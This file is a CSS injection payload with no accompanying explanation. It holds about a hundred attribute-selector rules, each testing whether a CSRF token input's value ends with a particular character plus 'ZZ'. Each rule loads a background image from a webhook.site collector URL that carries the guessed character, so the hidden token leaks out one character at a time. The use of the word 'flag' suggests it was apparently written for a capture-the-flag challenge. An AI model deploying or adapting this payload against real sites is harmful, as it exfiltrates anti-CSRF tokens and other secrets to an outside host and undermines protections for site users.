input.csrf[value$='aZZ'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=aZZ); }
input.csrf[value$='bZZ'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=bZZ); }
input.csrf[value$='cZZ'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=cZZ); }
input.csrf[value$='dZZ'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=dZZ); }
input.csrf[value$='eZZ'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=eZZ); }
input.csrf[value$='fZZ'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=fZZ); }
input.csrf[value$='gZZ'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=gZZ); }
input.csrf[value$='hZZ'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=hZZ); }
input.csrf[value$='iZZ'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=iZZ); }
input.csrf[value$='jZZ'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=jZZ); }
input.csrf[value$='kZZ'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=kZZ); }
input.csrf[value$='lZZ'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=lZZ); }
input.csrf[value$='mZZ'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=mZZ); }
input.csrf[value$='nZZ'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=nZZ); }
input.csrf[value$='oZZ'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=oZZ); }
input.csrf[value$='pZZ'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=pZZ); }
input.csrf[value$='qZZ'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=qZZ); }
input.csrf[value$='rZZ'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=rZZ); }
input.csrf[value$='sZZ'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=sZZ); }
input.csrf[value$='tZZ'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=tZZ); }
input.csrf[value$='uZZ'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=uZZ); }
input.csrf[value$='vZZ'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=vZZ); }
input.csrf[value$='wZZ'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=wZZ); }
input.csrf[value$='xZZ'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=xZZ); }
input.csrf[value$='yZZ'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=yZZ); }
input.csrf[value$='zZZ'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=zZZ); }
input.csrf[value$='AZZ'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=AZZ); }
input.csrf[value$='BZZ'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=BZZ); }
input.csrf[value$='CZZ'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=CZZ); }
input.csrf[value$='DZZ'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=DZZ); }
input.csrf[value$='EZZ'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=EZZ); }
input.csrf[value$='FZZ'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=FZZ); }
input.csrf[value$='GZZ'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=GZZ); }
input.csrf[value$='HZZ'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=HZZ); }
input.csrf[value$='IZZ'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=IZZ); }
input.csrf[value$='JZZ'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=JZZ); }
input.csrf[value$='KZZ'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=KZZ); }
input.csrf[value$='LZZ'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=LZZ); }
input.csrf[value$='MZZ'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=MZZ); }
input.csrf[value$='NZZ'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=NZZ); }
input.csrf[value$='OZZ'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=OZZ); }
input.csrf[value$='PZZ'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=PZZ); }
input.csrf[value$='QZZ'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=QZZ); }
input.csrf[value$='RZZ'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=RZZ); }
input.csrf[value$='SZZ'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=SZZ); }
input.csrf[value$='TZZ'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=TZZ); }
input.csrf[value$='UZZ'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=UZZ); }
input.csrf[value$='VZZ'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=VZZ); }
input.csrf[value$='WZZ'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=WZZ); }
input.csrf[value$='XZZ'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=XZZ); }
input.csrf[value$='YZZ'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=YZZ); }
input.csrf[value$='ZZZ'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=ZZZ); }
input.csrf[value$='0ZZ'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=0ZZ); }
input.csrf[value$='1ZZ'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=1ZZ); }
input.csrf[value$='2ZZ'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=2ZZ); }
input.csrf[value$='3ZZ'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=3ZZ); }
input.csrf[value$='4ZZ'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=4ZZ); }
input.csrf[value$='5ZZ'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=5ZZ); }
input.csrf[value$='6ZZ'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=6ZZ); }
input.csrf[value$='7ZZ'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=7ZZ); }
input.csrf[value$='8ZZ'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=8ZZ); }
input.csrf[value$='9ZZ'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=9ZZ); }
input.csrf[value$='²ZZ'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=²ZZ); }
input.csrf[value$='&ZZ'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=&ZZ); }
input.csrf[value$='éZZ'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=éZZ); }
input.csrf[value$='~ZZ'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=~ZZ); }
input.csrf[value$='"ZZ'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag="ZZ); }
input.csrf[value$='#ZZ'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=#ZZ); }
input.csrf[value$='{ZZ'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag={ZZ); }
input.csrf[value$='(ZZ'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=(ZZ); }
input.csrf[value$='[ZZ'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=[ZZ); }
input.csrf[value$='-ZZ'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=-ZZ); }
input.csrf[value$='|ZZ'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=|ZZ); }
input.csrf[value$='èZZ'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=èZZ); }
input.csrf[value$='`ZZ'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=`ZZ); }
input.csrf[value$='_ZZ'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=_ZZ); }
input.csrf[value$='\ZZ'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=\ZZ); }
input.csrf[value$='çZZ'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=çZZ); }
input.csrf[value$='^ZZ'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=^ZZ); }
input.csrf[value$='àZZ'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=àZZ); }
input.csrf[value$='@ZZ'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=@ZZ); }
input.csrf[value$=')ZZ'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=)ZZ); }
input.csrf[value$=']ZZ'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=]ZZ); }
input.csrf[value$='=ZZ'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag==ZZ); }
input.csrf[value$='}ZZ'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=}ZZ); }
input.csrf[value$='°ZZ'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=°ZZ); }
input.csrf[value$='/ZZ'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=/ZZ); }
input.csrf[value$='+ZZ'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=+ZZ); }
input.csrf[value$=',ZZ'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=,ZZ); }
input.csrf[value$='?ZZ'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=?ZZ); }
input.csrf[value$=';ZZ'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=;ZZ); }
input.csrf[value$='.ZZ'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=.ZZ); }
input.csrf[value$=':ZZ'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=:ZZ); }
input.csrf[value$='!ZZ'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=!ZZ); }
input.csrf[value$='§ZZ'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=§ZZ); }
input.csrf[value$='%ZZ'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=%ZZ); }
input.csrf[value$='ùZZ'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=ùZZ); }
input.csrf[value$='*ZZ'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=*ZZ); }
input.csrf[value$='µZZ'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=µZZ); }
input.csrf[value$='$ZZ'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=$ZZ); }
input.csrf[value$='£ZZ'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=£ZZ); }
input.csrf[value$='¤ZZ'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=¤ZZ); }
input.csrf[value$='¨ZZ'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=¨ZZ); }
input.csrf[value$=' ZZ'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag= ZZ); }
